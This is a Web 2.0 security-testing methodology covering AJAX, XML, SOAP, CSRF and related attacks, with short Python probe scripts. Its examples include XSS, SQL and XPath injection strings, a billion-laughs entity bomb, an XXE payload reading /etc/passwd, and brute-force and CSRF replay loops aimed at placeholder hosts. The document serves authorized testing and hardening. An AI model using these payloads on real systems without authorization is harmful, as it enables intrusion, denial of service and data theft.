Web 2.0 Security Testing Approach


Introduction:

Web 2.0 can be defined as the evolving trend of World Wide Web technologies and web design that aims to enhance creativity, communication, secure information sharing, collaboration and functionality of the web. In contrast to the static nature of Web 1.0, Web 2.0 systems rely heavily upon user-generated content. In fact, Web 2.0 has been described as the “participatory Web.” For example, blogs and photo-sharing services enable consumers to add and update their own content. While Web 2.0 threats emanate primarily from new usage patterns, several technologies are so widespread in Web 2.0 applications that security threats associated with them are characteristically considered Web 2.0 security threats. Examples of such technologies include AJAX, widgets, and application platforms such as blogs, wikis and social networks.

Web 2.0 Threats:

Web 2.0 is both a set of technologies and a new set of consumer behaviors. The combination of these two elements has created an enormous opportunity for attackers to exploit online resources for “fun and profit.” It is important to understand the implications of these new risks, particularly when considering employing Web 2.0 technologies for professional and commercial use. Yamanner, Samy and Spaceflash-type worms exploit “client-side” AJAX frameworks, creating new avenues of attack and compromising confidential information. On the “server side,” XML-based Web services are replacing some key functionality and providing distributed application access through Web services interfaces. These remote capabilities to invoke methods over GET, POST or SOAP from the Web browser itself provide new openings into applications. On the other side, RIA frameworks built on XML, XUL, Flash, Applets and JavaScript are adding new possible sets of attack vectors. RIA, AJAX and Web services are adding new dimensions to Web application security.


Test Approach:

It is the goal of our security research team to further expose these threats and to promote the secure use of Web 2.0 technologies for business, so that organizations can take advantage of the huge opportunities afforded by this next generation of the Web.

Our Web 2.0 Security Testing Framework comprises some common web vulnerabilities, such as XSS, injections and CSRF, as well as some newer threats that are harder to mitigate and may fall into the realm of logic issues, such as insufficient authentication and insufficient anti-automation. On top of that, the abstract nature of Web 2.0 turns phishing, a threat not usually associated with web applications, into a Web 2.0 problem.

Highlights:

Automated exploitation and accurate vulnerability validation

Comprehensive coverage of OWASP application vulnerabilities such as cross-site scripting, SQL injection, HTTP response splitting, parameter tampering, hidden field manipulation, backdoors/debug options, stealth commanding, session fixation, automatic intelligent form filling, forceful browsing, application buffer overflow, cookie poisoning, third-party misconfiguration, HTTP attacks, XML/SOAP tests, content spoofing, LDAP injection and XPath injection.

Support for modern websites using JavaScript, Macromedia Flash, AJAX, Java Applets, ActiveX.

Business logic verification and testing.

Combination of automated testing with expert validation & custom exploitation.

Prioritized threat profiling with effective remediation.

The following are the types of tests covered as per our guidelines:

1. AJAX Testing:
AJAX is one of the latest web development techniques for creating more advanced and more responsive web applications. While AJAX provides many useful features, it also opens the door to vulnerabilities if applications are not designed and developed properly. Conventional web application vulnerabilities apply to AJAX-based development, along with several specific ones such as cross-site request forgery (CSRF/XSRF).

1.1 Testing for Cross-site scripting vulnerabilities in AJAX
In the past few months, several organizations, including Yahoo Mail and MySpace.com, have reported cross-site scripting attacks in which malicious JavaScript code from a particular Web site gets executed in the victim’s browser, thereby compromising information. Because AJAX executes on the client side, it gives an attacker new places in which a malicious script can run. The attacker is only required to craft a malicious link to coax unsuspecting users into visiting a certain page from their Web browsers. This vulnerability existed in traditional applications as well, but AJAX has added a new dimension to it.
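As an illustration, a minimal probe for a reflected XSS sink might look like the following sketch. The endpoint and parameter name are hypothetical, and the script only checks whether a marker payload is echoed back unencoded:

```python
# Minimal reflected-XSS probe (hypothetical endpoint and parameter name).
# Sends a marker payload and checks whether the response echoes it unencoded.
import requests

PAYLOAD = '<script>alert("xss-probe")</script>'
url = "http://example.test/search"  # hypothetical AJAX endpoint

resp = requests.get(url, params={"q": PAYLOAD}, timeout=10)
if PAYLOAD in resp.text:
    print("Possible reflected XSS: payload returned unencoded")
else:
    print("Payload appears to be filtered or encoded")
```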

1.2 Testing for Malicious AJAX code execution
AJAX calls are silent, and end users cannot easily determine whether the browser is making background calls using the XMLHttpRequest object. When the browser makes an AJAX call to any Web site, it replays cookies for each request. This can lead to potential opportunities for compromise.
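The cookie-replay behavior can be simulated outside the browser. In this sketch a requests Session object stands in for the browser: once a cookie is set, every later request to the site carries it automatically, just as silent XMLHttpRequest calls do (URLs are hypothetical):

```python
# Simulates browser cookie replay with a persistent session.
import requests

s = requests.Session()
s.get("http://example.test/login")            # hypothetical URL that sets a session cookie
r = s.get("http://example.test/api/profile")  # cookie replayed without any user action
print(r.request.headers.get("Cookie"))        # shows what was silently attached
```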

1.3 Testing for Client side validation in AJAX routines
Today, in the era of Web 2.0, most applications use AJAX routines to perform many activities on the client side, such as client-side validation for data types, content checking, date fields, etc. Developers often make the mistake of assuming that validation is fully taken care of in these AJAX routines. Client-side checks must be backed up by server-side checks as well. It is possible to bypass AJAX-based validation and make POST or GET requests directly to the application – a major source of input-validation attacks such as SQL injection, LDAP injection, etc. that can compromise a Web application’s key resources.
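A tester can demonstrate the gap by skipping the AJAX layer entirely and posting directly to the server endpoint. The URL and field names below are hypothetical:

```python
# Bypasses client-side AJAX validation by posting straight to the server.
import requests

data = {
    "username": "tester",
    "age": "not-a-number",     # would be rejected by the client-side validator
    "comment": "' OR '1'='1",  # classic SQL injection probe
}
resp = requests.post("http://example.test/api/register", data=data, timeout=10)
print(resp.status_code, resp.text[:200])
# If the server accepts the malformed input, validation exists only on the client.
```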

2. Testing for Insufficient Authentication Control
In many Web 2.0 applications, content is entrusted to many users, not just a select number of authorized personnel. That means there is a greater chance that a less-experienced user will make a change that negatively affects the overall system. This design can also be exploited by hackers, who now have access to a greater number of “administrative” accounts whose passwords can often be easily cracked if the correct security controls are not in place. The systems may also have insufficient brute-force controls, permit clear-text passwords, or be tied together in a single sign-on environment, making a successful attack that much more damaging.
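A simple way to test for missing brute-force controls is to replay failed logins and watch for lockouts or CAPTCHAs. This is a sketch with a hypothetical endpoint and field names; run it only against systems you are authorized to test:

```python
# Probes for brute-force protections by replaying failed logins.
import requests

url = "http://example.test/login"  # hypothetical login endpoint
for attempt in range(20):
    r = requests.post(url, data={"user": "admin", "pass": f"guess{attempt}"}, timeout=10)
    # A well-defended application should start returning lockouts,
    # delays, or CAPTCHA challenges well before 20 attempts.
    print(attempt, r.status_code)
```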

3. Testing for XML Poisoning
XML traffic goes back and forth between server and browser in many Web 2.0 applications, and Web applications consume XML blocks coming from AJAX clients. It is possible to poison this XML block. A common technique is to apply recursive payloads, producing similar XML nodes many times over; if the parsing engine’s handling is poor, this may result in a denial of service on the server. Many attackers also produce malformed XML documents that can disrupt logic, depending on the parsing mechanism in use on the server. Two types of parsing mechanisms are available on the server side – SAX and DOM. This same attack vector is also used against Web services, since they consume SOAP messages, and SOAP messages are nothing but XML messages. Large-scale adoption of XML at the application layer opens up new opportunities for this attack vector.

An XML external entity reference is an XML property that can be manipulated by an attacker. This can lead to arbitrary file reads or TCP connections that can be leveraged by the attacker. XML schema poisoning is another XML poisoning attack vector that can change execution flow and help an attacker compromise confidential information.
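The two payload classes described above can be kept as test strings. The sketch below shows a recursive-entity (“billion laughs”) payload and an external-entity payload, and then demonstrates that a hardened parser such as defusedxml rejects both; never feed these to an unhardened parser:

```python
# Classic XML poisoning payloads, kept as strings for testing.
from defusedxml.ElementTree import fromstring

BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""

XXE = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>"""

for name, payload in [("billion laughs", BILLION_LAUGHS), ("XXE", XXE)]:
    try:
        fromstring(payload)
    except Exception as exc:
        print(f"Hardened parser rejected {name} payload: {exc}")
```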

4. Testing for RSS/Atom Injection
This is a new Web 2.0 attack. RSS feeds are a common means of sharing information on portals and Web applications. These feeds are consumed by Web applications and sent to the browser on the client side. One can inject literal JavaScript into RSS feeds to generate attacks on the client browser. When an end user visits the Web site and loads the page with the RSS feed, the malicious script – one that can install software or steal cookies – gets executed. This is a lethal client-side attack. Worse, it can be mutated. With RSS and Atom feeds becoming an integral part of Web applications, it is important to filter out certain characters on the server side before pushing the data out to the end user.
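A first-pass check on the server side is to scan outgoing feed items for raw script content before they reach the browser. This sketch uses a hypothetical feed URL and assumes a plain RSS 2.0 layout:

```python
# Scans an RSS feed for unescaped <script> content in item descriptions.
import requests
from xml.etree import ElementTree

resp = requests.get("http://example.test/feed.rss", timeout=10)  # hypothetical feed
root = ElementTree.fromstring(resp.content)
for item in root.iter("item"):
    desc = item.findtext("description") or ""
    if "<script" in desc.lower():
        print("Unescaped script in feed item:", item.findtext("title"))
```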

5. Testing for Information Integrity
Data integrity is one of the key elements of data security. Although a hack could lead to loss of integrity, so can unintentional misinformation. A great example of this in the public arena is a mistaken edit on Wikipedia which is then accepted as fact by many of the site’s visitors. In a business environment, having systems open to many users allows a malicious or mistaken user or users to post and publish inaccurate information which destroys the integrity of the data.

6. Testing for WSDL Scanning and Enumeration
WSDL (Web Services Description Language) is an interface to Web services. The WSDL file provides key information about technologies, exposed methods, invocation patterns, etc. This is very sensitive information and can help an attacker define exploitation methods. Unnecessary functions or methods left open can spell potential disaster for Web services. It is important to protect the WSDL file or provide limited access to it. In real-world scenarios, it is possible to discover several vulnerabilities through WSDL scanning.
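In practice, enumeration starts by pulling the WSDL and listing every exposed operation; each unexpected method is a candidate for deeper testing. The service URL below is hypothetical:

```python
# Fetches a WSDL file and enumerates the operations it exposes.
import requests
from xml.etree import ElementTree

WSDL_NS = "{http://schemas.xmlsoap.org/wsdl/}"  # standard WSDL 1.1 namespace
resp = requests.get("http://example.test/service?wsdl", timeout=10)
tree = ElementTree.fromstring(resp.content)
for op in tree.iter(WSDL_NS + "operation"):
    print("Exposed operation:", op.get("name"))
```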

7. Testing for CSRF
In a CSRF attack, victims visit what appear to be innocent-looking web sites that actually contain malicious code generating requests to a different site. Due to heavy use of AJAX, Web 2.0 applications are potentially more vulnerable to this type of attack. In legacy applications, most user-generated requests produced a visual effect on the screen, making CSRF easier to spot; Web 2.0 systems’ lack of visual feedback makes the attack less apparent. A recent example of CSRF involved a vulnerability in Twitter through which site owners could obtain the Twitter profiles of their visitors.
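A basic test is to replay a state-changing request without the anti-CSRF token and see whether it still succeeds. The endpoint, field and cookie value below are placeholders:

```python
# Checks whether a state-changing request succeeds without a CSRF token.
import requests

cookies = {"session": "VICTIM_SESSION_VALUE"}  # placeholder session cookie
resp = requests.post(
    "http://example.test/account/email",      # hypothetical endpoint
    data={"email": "attacker@example.test"},  # note: no CSRF token included
    cookies=cookies,
    timeout=10,
)
# Success here, with no token or Origin/Referer check, means the endpoint
# can be driven by a forged cross-site request.
print(resp.status_code)
```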

8. Testing for web services routing issues
Web services security protocols include WS-Routing. WS-Routing allows SOAP messages to travel in a specific sequence through various nodes on the Internet, and encrypted messages often traverse these nodes. A compromise of any intermediate node results in possible access to the SOAP messages traveling between the two end points, which can be a serious security breach. As Web applications move to adopt the Web services framework, focus shifts to these new protocols and new attack vectors are generated.

9. Testing for Insufficient Anti Automation
The programmatic interfaces of Web 2.0 applications make it easier for hackers to automate attacks. In addition to brute-force and CSRF attacks, other examples include the automated retrieval of large amounts of information and the automated opening of accounts. Anti-automation mechanisms such as CAPTCHAs can help slow down or thwart these types of attacks.
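One way to test this control is to script repeated sign-ups and count how many succeed before any CAPTCHA or rate limit kicks in. The endpoint and fields are hypothetical:

```python
# Probes for anti-automation controls by scripting repeated sign-ups.
import requests

url = "http://example.test/signup"  # hypothetical registration endpoint
accepted = 0
for i in range(10):
    r = requests.post(url, data={"user": f"bot{i}", "pass": "P@ssw0rd!"}, timeout=10)
    if r.status_code == 200:
        accepted += 1
print(f"{accepted}/10 automated sign-ups accepted; a CAPTCHA should block these")
```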

When introducing Web 2.0 into the workplace, it is important to have a good understanding of the types of risks involved. That said, while Web 2.0 may present different types of challenges, they are not necessarily any worse than the risks of legacy applications – just different. And the opportunities that Web 2.0 technology can provide a business make overcoming these potential threats worth the effort.

10. Testing for Parameter manipulation with SOAP
Web services consume information and variables from SOAP messages, and it is possible to manipulate these variables. For example, a value such as “10” sits in one of the nodes of a SOAP message. An attacker can manipulate this node and try different injections – SQL, LDAP, XPath, command shell – exploring possible attack vectors to get hold of internal machines. Incorrect or insufficient input validation in Web services code leaves the application open to compromise. This is a newly available attack vector for targeting Web applications running on Web services.
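A tamper test can be run by building the SOAP envelope by hand and replacing the node value with an injection probe. The service URL, SOAPAction and element names below are all hypothetical:

```python
# Tampers with a SOAP parameter node and posts the envelope directly.
import requests

INJECTION = "10' OR '1'='1"  # SQL injection probe in place of the value 10
envelope = f"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetItem xmlns="http://example.test/ws">
      <id>{INJECTION}</id>
    </GetItem>
  </soap:Body>
</soap:Envelope>"""

resp = requests.post(
    "http://example.test/ws/endpoint",
    data=envelope,
    headers={"Content-Type": "text/xml",
             "SOAPAction": "http://example.test/ws/GetItem"},
    timeout=10,
)
print(resp.status_code, resp.text[:200])  # verbose SOAP faults may confirm injection
```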

11. Testing for XPath Injection in SOAP Messages
XPath is a language for querying XML documents and is similar to SQL in that we supply certain information (parameters) and fetch matching records – in this case nodes from an XML document rather than rows from a database. XPath parsing is supported by many languages. Web applications consume large XML documents, and these applications often take input from the end user to form XPath statements. Such sections of code are vulnerable to XPath injection. If an XPath injection executes successfully, an attacker can bypass authentication mechanisms or cause the loss of confidential information. There are a few known flaws in XPath that can be leveraged by an attacker, and the only way to block this attack vector is to provide proper input validation before passing values to an XPath statement.
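The vulnerable pattern and its fix can both be shown in a few lines. This sketch assumes a hypothetical users.xml file with <user><name>...</name><password>...</password></user> records, and uses lxml:

```python
# Demonstrates XPath injection via string concatenation, then the safer
# parameterized form (hypothetical users.xml layout).
from lxml import etree

doc = etree.parse("users.xml")       # hypothetical XML user store
user, pwd = "admin", "' or '1'='1"   # classic XPath injection payload

# Vulnerable: concatenation lets the payload rewrite the predicate,
# so the query matches every user and authentication is bypassed.
query = f"//user[name/text()='{user}' and password/text()='{pwd}']"
print(doc.xpath(query))

# Safer: XPath variables keep the input as data, not query structure.
print(doc.xpath("//user[name/text()=$u and password/text()=$p]", u=user, p=pwd))
```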

12. Testing for RIA Thick Client Binary Manipulation
Rich Internet Applications (RIA) use rich UI components such as Flash, ActiveX controls or Applets as their primary interfaces to Web applications. There are a few security issues with this framework. One of the major issues is session management, since the component runs in the browser and shares the same session. At the same time, since the entire binary component is downloaded to the client, an attacker can reverse engineer the binary file and decompile the code. It is possible to patch these binaries and bypass some of the authentication logic contained in the code. This is another interesting attack vector for Web 2.0 frameworks.

Tools Used:
AppScan
Acunetix
iViZ APT
OWASP Sprajax
ScanAjax

Conclusion:
The three most important technological vectors for Web 2.0 applications are AJAX, RIA and Web services. The huge benefits afforded by Web 2.0 do not come without a cost: to enable increased user interaction, integration APIs and web applications need to be more complex, and they need to support an ever-increasing set of clients. With these new technologies come new security issues, and ignoring them can lead to big disasters for the corporate world. In this document the discussion was restricted to some common attacks, but there are several other attack vectors as well. With the advent of Web 2.0, we must also focus on the security aspects of its different components: growing security awareness, secure coding practices and secure deployments offer the best defense against these new attack vectors.
